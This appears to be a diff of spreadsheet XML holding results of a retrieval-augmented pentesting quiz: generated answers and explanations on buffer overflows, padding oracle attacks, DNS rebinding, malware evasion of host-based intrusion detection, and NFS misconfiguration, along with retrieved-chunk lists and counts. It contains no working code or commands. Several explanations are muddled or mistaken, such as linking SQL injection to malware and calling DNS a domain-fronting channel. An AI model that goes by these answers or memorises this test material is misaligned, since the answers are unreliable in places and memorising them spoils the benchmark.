+Explanation: In this scenario, exploiting a buffer overflow vulnerability is the most likely target because this class of vulnerability commonly allows for arbitrary code execution by overflowing the application's buffer, thus overwriting adjacent memory locations, which can include executable code or pointers. SQL injection, while dangerous, is more relevant to database techniques typically found in malware. Cross-site scripting (XSS) and Man-in-the-middle attack are also potential vulnerabilities, but they do not directly enable arbitrary code execution on the operating system level through an application like a buffer overflow does.</t>
         </is>
       </c>
       <c r="G55" t="inlineStr">
@@ -4096,21 +3830,16 @@
 preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I55" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J55" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K55" t="inlineStr">
         <is>
@@ -4163,21 +3892,16 @@
 preemware_pentestingeval.pdf (Chunk: 8b0f324f-7120-43b9-ab53-e5747f2231ae, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 9b3ce6f9-42f5-4df6-a5ae-9070e935f278, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I56" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J56" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K56" t="inlineStr">
         <is>
@@ -4216,7 +3940,7 @@
       <c r="F57" t="inlineStr">
         <is>
           <t>Answer: Using a fuzzer to identify memory corruption vulnerabilities
-Explanation: Using a fuzzer to identify memory corruption vulnerabilities is the best technique among the choices for dynamically analyzing and identifying exploitable vulnerabilities in a proprietary application. Fuzzing involves providing invalid, unexpected, or random data as inputs to a computer program in order to discover coding errors and security loopholes that can lead to crashes, memory corruption, or other exploitable conditions. Conducting a comprehensive network scan using Nmap, though useful for understanding the target's network environment, does not directly help in analyzing proprietary applications for vulnerabilities. Implementing a phishing campaign is mainly used for gaining initial access and does not concern vulnerability assessment of applications. Executing static code analysis is useful but is not a dynamic analysis technique; it looks at the code without executing it and therefore might miss runtime vulnerabilities that fuzzing could catch.</t>
+Explanation: Using a fuzzer to identify memory corruption vulnerabilities is the best technique among the choices for dynamically analyzing and identifying exploitable vulnerabilities in a proprietary application. Fuzzing involves providing invalid, unexpected, or random data as inputs to a computer program in order to discover coding errors and security loopholes that can lead to crashes, memory corruption, or other exploitable conditions. Conducting a comprehensive network scan using Nmap, though useful for understanding the target's network environment, does not directly help in analyzing proprietary applications for vulnerabilities. Implementing a phishing campaign is mainly for gaining initial access and does not concern vulnerability assessment of applications. Executing static code analysis is useful but is not a dynamic analysis technique; it looks at the code without executing it and therefore might miss runtime vulnerabilities that fuzzing could catch.</t>
         </is>
       </c>
       <c r="G57" t="inlineStr">
@@ -4230,21 +3954,16 @@
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I57" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J57" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K57" t="inlineStr">
         <is>
@@ -4283,7 +4002,7 @@
       <c r="F58" t="inlineStr">
         <is>
           <t>Answer: Exploiting buffer overflow vulnerabilities
-Explanation: Exploiting buffer overflow vulnerabilities is often the most effective technique for gaining remote code execution on poorly patched systems, particularly legacy Windows servers. Buffer overflow exploits take advantage of programming errors in software that do not properly manage memory allocation. When a server is poorly patched, it is more likely to have unpatched buffer overflow vulnerabilities that can be exploited to gain remote code execution. SQL injection attacks and Cross-site scripting (XSS) are primarily used for attacking web applications rather than directly exploiting the backend database or gaining remote code execution on a server. Using default credentials may provide initial access but does not guarantee remote code execution.</t>
+Explanation: Exploiting buffer overflow vulnerabilities is often the most effective technique for gaining remote code execution on poorly patched systems, particularly legacy Windows servers. Buffer overflow exploits take advantage of programming errors in software that do not properly manage memory allocation. When a server is poorly patched, it is more likely to have these types of vulnerabilities that can be exploited by an attacker.</t>
         </is>
       </c>
       <c r="G58" t="inlineStr">
@@ -4297,21 +4016,16 @@
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I58" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J58" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K58" t="inlineStr">
         <is>
@@ -4350,7 +4064,7 @@
       <c r="F59" t="inlineStr">
         <is>
           <t>Answer: Padding Oracle Attack
-Explanation: The Padding Oracle Attack specifically targets the way cryptographic padding is handled within secure communication protocols. This type of attack allows an attacker to decrypt data without needing the actual encryption key by manipulating the padding, thereby deciphering information through the errors returned by the server.</t>
+Explanation: A Padding Oracle Attack exploits the decryption side of a cryptographic process, where an attacker gains information about the decryption key based on the response to manipulated ciphertexts. This attack can be mitigated by ensuring encryption mechanisms do not allow access to any information regarding the padding validity, often by handling errors securely and validating padding correctly without revealing details. SQL Injection, Cross-Site Scripting (XSS), and Cross-Site Request Forgery (CSRF) relate to different vulnerabilities involving illegal data input, script injections, and unauthorized actions from authenticated users, respectively, reflecting breaches unrelated to encryption padding.</t>
         </is>
       </c>
       <c r="G59" t="inlineStr">
@@ -4364,21 +4078,16 @@
 preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: f31cfefc-9fab-4a23-aa84-53a64623ddac, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I59" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J59" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K59" t="inlineStr">
         <is>
@@ -4417,7 +4126,7 @@
       <c r="F60" t="inlineStr">
         <is>
           <t>Answer: Domain Name System (DNS)
-Explanation: In an advanced persistent threat (APT) campaign, the most likely service to be exploited for domain fronting to stealthily exfiltrate data is the Domain Name System (DNS). DNS is a critical component of the internet infrastructure and is used by almost all applications that require network connectivity. By leveraging DNS for domain fronting, attackers can route their traffic through legitimate domains, making it difficult to detect and block their malicious activities. The other options, NetBIOS name service, Dynamic Host Configuration Protocol (DHCP), and Simple Mail Transfer Protocol (SMTP), are also important network protocols but are less commonly used for domain fronting in APT campaigns due to their specific purposes and limitations.</t>
+Explanation: In an advanced persistent threat (APT) campaign, the most likely service to be exploited for domain fronting is the Domain Name System (DNS). DNS is used to translate domain names into IP addresses and can be manipulated to mask the true origin of data exfiltration. By using domain fronting, attackers can route their traffic through legitimate domains, making it difficult for security systems to detect and block malicious activity. While NetBIOS name service, DHCP, and SMTP are also network services, they are not typically used for domain fronting in the context of APT campaigns.</t>
         </is>
       </c>
       <c r="G60" t="inlineStr">
@@ -4431,21 +4140,16 @@
 preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I60" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J60" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K60" t="inlineStr">
         <is>
@@ -4484,7 +4188,7 @@
       <c r="F61" t="inlineStr">
         <is>
           <t>Answer: Side-channel attack using cache access patterns
-Explanation: A side-channel attack using cache access patterns is the most effective technique among the listed options for extracting encryption keys without direct access. This type of attack exploits information gained from the implementation of a cryptosystem rather than exploiting weaknesses in the cryptosystem itself. It leverages how operations affect the system's hardware, thus allowing an attacker to infer sensitive data indirectly. A timing attack on RSA, though related to side-channel strategies, specifically exploits computation time variations and is less effective in extracting keys compared to cache pattern monitoring. Brute force attacks do not typically involve the indirect extraction of encryption keys; they rely on repetitive guessing, and XSS attacks exploit web application vulnerabilities to execute malicious scripts, which are unrelated to encryption key extraction.</t>
+Explanation: A side-channel attack using cache access patterns is the most effective technique among the listed options for extracting encryption keys without direct access. This type of attack exploits information gained from the implementation of a cryptosystem rather than exploiting weaknesses in the cryptosystem itself. It leverages how operations affect the system's hardware, thus allowing an attacker to infer sensitive data indirectly. A timing attack on RSA, though related to side-channel strategies, specifically exploits computation time variations and is less effective in extracting keys compared to cache pattern monitoring. Brute force and XSS attacks do not typically involve the indirect extraction of encryption keys; brute force attacks rely on repetitive guessing, and XSS attacks exploit web application vulnerabilities to execute malicious scripts, which are unrelated to encryption key extraction.</t>
         </is>
       </c>
       <c r="G61" t="inlineStr">
@@ -4498,21 +4202,16 @@
 preemware_pentestingeval.pdf (Chunk: eb7215a5-fd15-459f-95a3-bdedf78fb5c9, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 7e2feb30-1a3a-4b3e-b712-d9cbf873f1a0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: bc058460-98fa-4086-90cc-12a84379063d, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I61" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J61" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K61" t="inlineStr">
         <is>
@@ -4551,7 +4250,7 @@
       <c r="F62" t="inlineStr">
         <is>
           <t>Answer: Executing a DNS query rebinding attack
-Explanation: Executing a DNS query rebinding attack is most effective for bypassing the same-origin policy in this context. DNS rebinding manipulates the resolution of domain names to switch the IP address to which the domain points after the victim's browser already allowed scripts from that domain to execute, essentially tricking the browser into directing data to an attacker-controlled site. Injecting a cross-site scripting payload, while dangerous, primarily targets vulnerabilities in web applications rather than circumventing same-origin policies directly. Deploying a denial-of-service attack does not focus on data extraction but rather on making a service unavailable, which does not meet the objective of accessing sensitive information. Spoofing MAC addresses could be useful in other scenarios such as bypassing network access controls but does not enable exploitation of SQL injection.</t>
+Explanation: In the context of red team operations, bypassing the same-origin policy to gain access to sensitive information through a victim's browser is most effectively achieved by executing a DNS query rebinding attack. This technique manipulates DNS responses to bypass the same-origin policy and allows an attacker to access resources that would otherwise be restricted due to the policy. The other options, while potentially useful in different contexts, do not directly address the issue of bypassing the same-origin policy.</t>
         </is>
       </c>
       <c r="G62" t="inlineStr">
@@ -4565,21 +4264,16 @@
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: ba50b01d-44c3-44e7-a0b6-256236393541, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I62" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J62" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K62" t="inlineStr">
         <is>
@@ -4618,7 +4312,7 @@
       <c r="F63" t="inlineStr">
         <is>
           <t>Answer: Using a compromised printer in the network
-Explanation: In an APT scenario, the goal is to maintain prolonged, stealthy access to a target network to gather or manipulate sensitive information. Among the listed options, 'Using a compromised printer in the network' is the best technique for maintaining long-term access. Printers and other peripheral devices are often overlooked in terms of security, frequently lack proper monitoring, and are generally always on and connected to the network. This makes them ideal for staging persistent backdoors or for exfiltrating data without drawing attention. The other options, such as exploiting a SQL injection or sending phishing emails, are more focused on initial access rather than maintaining long-term access.</t>
+Explanation: In an APT scenario, the goal is to maintain prolonged, stealthy access to a target network to gather or manipulate sensitive information. Among the listed options, 'Using a compromised printer in the network' is the best technique for maintaining long-term access. Printers and other peripheral devices are often overlooked in terms of security, frequently lack proper monitoring, and are generally always on and connected to the network. This makes them ideal for staging persistent backdoors or for exfiltrating data without drawing attention. The other options, such as exploiting a SQL injection in a web application or sending phishing emails to system administrators, may be effective for initial access but do not inherently provide long-term access and can be detected and mitigated more easily. Bypassing a firewall using IP spoofing is a technique that allows an attacker to bypass security measures, but it does not guarantee long-term access or maintain persistence on the system once access is achieved.</t>
         </is>
       </c>
       <c r="G63" t="inlineStr">
@@ -4632,21 +4326,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I63" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J63" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K63" t="inlineStr">
         <is>
@@ -4685,8 +4374,7 @@
       <c r="F64" t="inlineStr">
         <is>
           <t>Answer: Implementing fingerprinting resistant techniques in a malware
-Explanation: Implementing fingerprinting resistant techniques in a malware is most beneficial for evading host-based intrusion detection systems (HIDS). Fingerprinting resistant techniques involve tactics that reduce or obscure the identifiable features of malware, such as static signatures or predictable behavior patterns, which are commonly used by HIDS to detect malicious activities. This might include polymorphism or
-Penetration Testing Question &amp; Answer</t>
+Explanation: Implementing fingerprinting resistant techniques in a malware is most beneficial for evading host-based intrusion detection systems (HIDS). Fingerprinting resistant techniques involve tactics that reduce or obscure the identifiable features of malware, such as static signatures or predictable behavior patterns, which are commonly used by HIDS to detect malicious activities. This might include polymorphism or stealth encryption methods that make it difficult for HIDS to identify and classify the malware based on its known characteristics. Using a fuzzing tool for post-exploitation data exfiltration, configuring a Command and Control (C2) server to redirect traffic, and employing Ciphertext-only cryptanalysis during initial access may also be useful techniques in certain contexts, but implementing fingerprinting resistant techniques is the most effective method for evading HIDS.</t>
         </is>
       </c>
       <c r="G64" t="inlineStr">
@@ -4700,21 +4388,16 @@
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f837578d-950d-4f8c-8074-42d97208fc1f, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I64" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J64" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K64" t="inlineStr">
         <is>
@@ -4753,7 +4436,7 @@
       <c r="F65" t="inlineStr">
         <is>
           <t>Answer: Utilizing NFS exports and weak permissions to gain file system access
-Explanation: Utilizing NFS exports and weak permissions to gain file system access is the most effective method in this scenario. NFS (Network File System) is commonly used in Unix-based networks to share files across the network. Misconfiguration such as improperly set export permissions can allow unauthorized clients to mount the file system and access sensitive data. This exploitation leverages the actual configuration errors directly related to data access, unlike SNMP brute forcing or SSH exploitation, which are less directly related to file system access. Injecting malicious code through unused UDP ports would generally not be relevant to exploiting a misconfiguration in file system access protocols.</t>
+Explanation: In a red team engagement, exploiting the misconfiguration in a Unix-based network to access sensitive data is most effectively achieved by utilizing NFS (Network File System) exports with weak permissions. This method allows an attacker to gain unauthorized access to files and directories on the target system by exploiting weak or misconfigured NFS settings, which can grant read/write privileges to unintended users or systems. The other options, while potentially useful in different contexts, are less directly related to this specific objective of gaining access to sensitive data through Unix-based network misconfiguration.</t>
         </is>
       </c>
       <c r="G65" t="inlineStr">
@@ -4767,21 +4450,16 @@
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9f7427dd-7d84-4217-88d8-469f2e60a674, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I65" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J65" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K65" t="inlineStr">
         <is>
@@ -4834,21 +4512,16 @@
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 3)
 cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 7bb4428a-25df-481c-9509-36c44aff10d1, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 2ed8c0e8-d43e-4d09-a902-9e44e6d56c0b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I66" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J66" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K66" t="inlineStr">
         <is>
@@ -4901,21 +4574,16 @@
